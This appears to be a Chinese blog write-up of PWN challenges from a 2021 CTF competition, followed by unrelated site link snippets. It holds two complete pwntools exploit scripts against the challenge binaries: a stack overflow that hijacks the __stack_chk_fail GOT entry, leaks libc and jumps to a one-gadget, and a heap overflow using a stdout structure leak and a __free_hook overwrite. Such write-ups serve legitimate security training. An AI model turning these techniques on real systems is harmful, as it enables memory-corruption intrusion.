bbbaby

控制__stack_chk_fail,栈溢出

from pwn import *

context.os = 'linux'

context.log_level = "debug"

context.arch = 'amd64'

p = process('./pwn1')#, env={"LD_PRELOAD":'./libc-2.27.so'})

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

elf = ELF('./pwn1')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

	gdb.attach(p)

	pause()

puts_plt = elf.plt['puts']

puts_got = elf.got['puts']

chk_fail = elf.got['__stack_chk_fail']

rdi = 0x0000000000400a03

pl = 'a'*0x118 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(0x000000000040086C) + p64(0x00000000004008BB)

p.sendlineafter('choice\n','0')

p.sendlineafter('address:\n',str(chk_fail))

p.sendafter('content:\n',p64(puts_plt))

p.sendlineafter('your choice\n','1')

p.sendlineafter('size:\n',str(0x1000))

p.sendafter('content:\n',pl)

p.sendlineafter('choice\n','2')

libcbase = uu64(r(6)) - libc.sym['puts']

ogg = libcbase + 0x4f322

pl = 'a'*0x118 + p64(ogg)

p.sendlineafter('your choice\n','1')

p.sendlineafter('size:\n',str(0x1000))

p.sendafter('content:\n',pl)

p.sendlineafter('choice\n','2')

itr()

Magic

打开一看

熟悉,像是控制流平坦化,不是,就是控制流平坦化混淆。

清楚llvm的混淆原理,那就慢慢分析叭

很简单就一个emmm uaf就完了主要难在分析上。

由于没有2.23的环境就不打了emmm

h3apclass

ren出的题目

这里是存在溢出的,如果把堆块填满的话这里就可以写到下一个堆块的size位置,造成类似off by one的效果,开启了沙盒,心中默念orw优先考虑栈迁移!!!!

已经劫持了,由于16分之一跳起来太难就不搞了

from pwn import *

context.arch = 'amd64'

context.log_level = 'debug'

#p = remote('39.99.242.16',10002)

p = process('./H3apClass')#, env={"LD_PRELOAD":'./libc.so.6'})

elf=ELF('./H3apClass')

libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

   gdb.attach(p)

   pause()

def add(idx,size,content):

	sla('4:Drop homework\n',1)

	sla('Which homework?\n',idx)

	sla('size:\n',size)

	p.sendafter('content:\n',content)

def edit(idx,content):

	sla('4:Drop homework\n',3)

	sla('Which homework?\n',idx)

	p.sendafter('content:\n',content)

def delete(idx):

	sla('4:Drop homework\n',4)

	sla('Which homework?\n',idx)

add(0,0x18,'b'*0x18)

add(1,0xf8,'bpc')

add(2,0xf8,'bpc')

add(3,0xf8,'bpc')

add(4,0xf8,'bpc')

add(5,0xf8,'bpc')

delete(5)

delete(4)

delete(3)

delete(2)

add(2,0xe8,'bpc')

add(3,0xe8,'bpc')

add(4,0xe8,'bpc')

add(5,0x18,'bpc')

pl = b'a'*0x18 + p16(0x7d1)

edit(0,pl)

delete(1)

delete(4)

delete(3)

delete(2)

add(2,0x70,'bpc')

add(3,0x70,'bpc')

add(4,0x10,'\xa0\x36')

delete(3)

delete(2)

add(2,0xf8,'bpc')

add(3,0xf8,p64(0xfbad1887)+p64(0)*3+b'\x00')

libcbase = uu64((ru('\x7f')[-5:]+b'\x7f')) - 0x1EC980

leak('libcbase',libcbase)

free = libcbase + libc.sym['__free_hook']

pl = b'a'*0x18 + p8(0x81)

edit(0,pl)

delete(0)

delete(1)

delete(5)

delete(4)

edit(2,p64(free)[:6])

add(0,0x18,'bpc')

add(1,0x18,'bpc')

ogg = libcbase + 0x154DD0

add(4,0x18,p64(ogg))

debug()

p.interactive()

[复现]陇原战"疫"2021网络安全大赛-PWN的更多相关文章

  1. Writeup:第五届上海市大学生网络安全大赛-Web

    目录 Writeup:第五届上海市大学生网络安全大赛-Web 一.Decade 无参数函数RCE(./..) 二.Easysql 三.Babyt5 二次编码绕过strpos Description: ...

  2. 2019年上海市大学生网络安全大赛两道misc WriteUp

    2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...

  3. 全面解析百度大脑发布“AI开发者‘战疫’守护计划”

    即日起,百度大脑发布“AI开发者战疫守护计划” 大疫当前,人人有责,携手开发者共同出击抗击疫情 基于百度大脑AI开放平台和飞桨深度学习平台,积极运用算法.算力.软件等“武器”助力抗疫!   谁能参与计 ...

  4. 百度大脑发布“AI开发者‘战疫’守护计划”,AI支援抗疫再升级

    面对新冠肺炎疫情,AI开发者们正在积极运用算法.算力.软件等“武器”助力抗疫.针对开发者们在疫情防控期间的开发与学习需求,2月6日,百度大脑推出“AI开发者‘战疫’守护计划”, 正在进行疫情防控相关应 ...

  5. 【巨杉数据库SequoiaDB】为“战疫” 保驾护航,巨杉在行动

    2020年,我们经历了一个不平静的新春,在这场大的“战疫”中,巨杉数据库也积极响应号召,勇于承担新一代科技企业的社会担当,用自己的行动助力这场疫情防控阻击战! 赋能“战疫”快速响应 巨杉数据库目前服务 ...

  6. 助力企业战疫提效保质,腾讯wetest远程办公工具包请查收!

    导语 疫情当前,减少个人的出行与聚集成为了抗击疫情的重要防线.不少企业为了员工的安全与战疫的目标,开始实行在家远程办公的措施.作为开发测试人员,对工作环境与设备软件的条件要求相对较高,当前在远程办公的 ...

  7. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhit ...

  8. [原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入、handler绕过)

    简介 今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊  晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤.. ...

  9. 高校战“疫”网络安全分享赛 Misc ez_mem&usb

    打开之后是一个流量包 用wireshark导出HTTP文件,有个upload,用一下binwalk,出来了一个镜像文件 用volatility搜一下,命令里有一个密码,看见了但是后来给忘了... 文件 ...

  10. IT运维软件免费送 智和信通战疫活动火热进行中

    突如其来的“新型冠状病毒”疫情牵动了全国人民的心,这是一场与病毒抗争,为生命逆行与时间赛跑的战役.举国上下众志成城面对疫情,在线医疗.在线教学.在线办公.在线会议.电商销售成为热点.线上经济的火热给企 ...

随机推荐

  1. Docker-Compose实战<上篇>

    1 什么是 docker-compose? Compose 是用于定义和运行多容器 Docker 应用程序的工具.通过 Compose,您可以使用 YML 文件来配置应用程序需要的所有服务.然后,使用 ...

  2. 第一章MySQL架构

    1.MySQL架构1.1连接管理与安全性 cpu维护缓存区,存储已就绪的线程,线程驻守在一个cpu上,创建销毁不用重新创建线程.1.2优化与执行 MySQL解析查询进行各种优化包括重写查询.决定表的读 ...

  3. python 统计 excel 表格中文件总大小

    需求:统计excel 表格中文件总大小 表格内容,包含Mi.Gi.KB 96.73Mi 95.89Mi 6.89Gi 6.75Gi 10.00KB 统计总大小代码,目标是将Gi.KB换算成 Mi,然后 ...

  4. laravel 内置auth()登录

    auth()命令 auth()->attempt()        登录验证 auth()->check        判断是否登录,有没有session缓存 auth()->log ...

  5. mysql的日期时间类型格式

    日期时间类型 一般用整型保存时间戳,因为PHP可以很方便的将时间戳进行格式化. datetime 8字节 日期及时间 1000-01-01 00:00:00 到 9999-12-31 23:59:59 ...

  6. yum install的时候提示:Loaded plugins: fastestmirror

    fastestmirror是yum的一个加速插件,这里是插件提示信息是插件不能用了. 不能用就先别用呗,禁用掉,先yum了再说. 1.修改插件的配置文件 # vi  /etc/yum/pluginco ...

  7. ping 请求找不到主机 www.baidu.com

    1.以管理员方式运行cmd 2.输入netsh winsock reset 3.重启电脑 4.如果还是不行,就删除C:\Windows\System32\drivers\etc里面的hosts文件试试 ...

  8. G6-Editor 编辑器入门使用教程

    一.前言 G6-Editor 是 AntV 官方提供的.专注于图可视化编辑器的类库,也是市面上完成度较高的图可视化编辑器.然而令人诟病的是其文档对新手极度不友好,我一度怀疑此文档只有他们自己开发人员才 ...

  9. 简单的理解synchronized锁升级

    前言 今天碰到一个synchronized锁升级的问题, 查了查, 发现一个帖子举例说明比较贴切, 特此转发, 如有问题, 欢迎讨论说明 转自: 木叶盒子 https://www.bilibili.c ...

  10. python菜鸟学习: 5.字符串的基本用法,进度条显示

    # -*- coding: utf-8 -*-import sys,timestr1 = "my name is liyuzhoupan"# 首字母大写print(str1.cap ...